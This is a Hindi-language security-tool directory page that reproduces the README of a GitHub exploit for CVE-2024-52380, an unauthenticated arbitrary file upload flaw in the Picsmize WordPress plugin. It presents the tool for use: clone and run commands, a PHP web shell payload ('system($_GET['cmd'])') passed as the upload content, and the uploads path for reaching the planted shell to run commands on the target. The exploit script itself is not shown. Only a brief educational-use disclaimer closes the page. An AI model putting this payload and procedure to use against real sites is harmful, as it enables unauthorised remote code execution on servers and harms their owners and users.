Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-52380-Exploit — वर्डप्रेस के लिए Picsmize प्लगइन मनमानी फ़ाइल अपलोड के लिए असुरक्षित है। | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2024-52380-exploit
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubnxploited/cve-2024-52380-exploit

CVE-2024-52380-Exploit

वर्डप्रेस के लिए Picsmize प्लगइन मनमानी फ़ाइल अपलोड के लिए असुरक्षित है।

रिपॉजिटरी देखें
311 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-52380-Exploit

WordPress के लिए Picsmize प्लगइन मनमानी फ़ाइल अपलोड के लिए कमजोर है।

विवरण

यह स्क्रिप्ट WordPress के Picsmize प्लगइन में एक कमजोरी (CVE-2024-52380) का शोषण करती है, जिससे बिना प्रमाणीकरण वाले हमलावर मनमानी फ़ाइल अपलोड कर सकते हैं। यह कमजोरी Picsmize के सभी संस्करणों में 1.0.0 तक मौजूद है। इस कमजोरी का शोषण करने से लक्षित सर्वर पर रिमोट कोड निष्पादन हो सकता है।

🌟 विशेषताएँ

  • प्लगइन संस्करण जाँचें: स्वचालित रूप से सत्यापित करता है कि लक्षित WordPress साइट Picsmize प्लगइन का कमजोर संस्करण उपयोग कर रही है या नहीं।
  • फ़ाइल अपलोड शोषण: यदि साइट कमजोर है तो लक्षित सर्वर पर मनमाने PHP पेलोड अपलोड करें।
  • कमांड लाइन इंटरफ़ेस: लक्षित URL और पेलोड निर्दिष्ट करने के लिए आसान-से-उपयोग CLI।

📖 कमजोरी विवरण

  • प्लगइन नाम: Picsmize
  • प्रभावित संस्करण: सभी संस्करण ≤ 1.0.0
  • कमजोरी प्रकार: बिना प्रमाणीकरण के मनमानी फ़ाइल अपलोड
  • CVE ID: CVE-2024-52380

🚀 उपयोग निर्देश

आवश्यक शर्तें

  • Python 3.7 या उच्चतर
  • requests लाइब्रेरी (pip install requests)
  • स्क्रिप्ट चलाना

    1. रिपॉजिटरी क्लोन करें:
      root@kitploit:~
      git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
      cd CVE-2024-52380-Exploit
      
      

    उपयोग -help:

    root@kitploit:~
    usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]
    
    Check plugin version and upload a PHP file to a WordPress site.
    
    options:
      -h, --help            show this help message and exit
      -u URL, --url URL     Base URL of the WordPress site (e.g., http://192.168.100.74:888).
      -c CONTENT, --content CONTENT
                            Content of the PHP file to be uploaded.
    

    उदाहरण

    root@kitploit:~
    python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"
    

    कमांड-लाइन तर्क

    स्क्रिप्ट उपयोग में आसानी के लिए दो कमांड-लाइन तर्क प्रदान करती है:

    1. -u / --url (आवश्यक):

      • उद्देश्य: लक्षित WordPress साइट का आधार URL निर्दिष्ट करता है।
      • उदाहरण:
        root@kitploit:~
        -u http://example.com
        
    2. -c / --content (वैकल्पिक):

      • उद्देश्य: अपलोड किए जाने वाले PHP पेलोड की सामग्री सेट करता है।
      • डिफ़ॉल्ट मान:
        root@kitploit:~
        <?php phpinfo(); ?>
        
      • उदाहरण:
        root@kitploit:~
        -c "<?php system($_GET['cmd']); ?>"
        

    📂 फ़ाइल अपलोड पथ

    स्पष्टीकरण:

    • /wordpress: WordPress साइट की मूल निर्देशिका।
    • wp-content/uploads: WordPress में मीडिया अपलोड के लिए डिफ़ॉल्ट निर्देशिका।
    • 2025/01: यह निर्देशिका संरचना सर्वर की दिनांक कॉन्फ़िगरेशन के आधार पर वर्ष (2025) और माह (जनवरी) से मेल खाती है।

    अपलोड की गई फ़ाइल तक कैसे पहुँचें:

    1. सफल अपलोड के बाद, पूर्ण URL का उपयोग करके फ़ाइल पर जाएँ। उदाहरण:

    http://target-site.com/wordpress/wp-content/uploads/2025/01/t-678b2ef61b3f41737174774.php

    ⚠️ अस्वीकरण

    यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। इस उपकरण का अनधिकृत उपयोग उन सिस्टमों के विरुद्ध करना जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।

    टूल डाउनलोड करें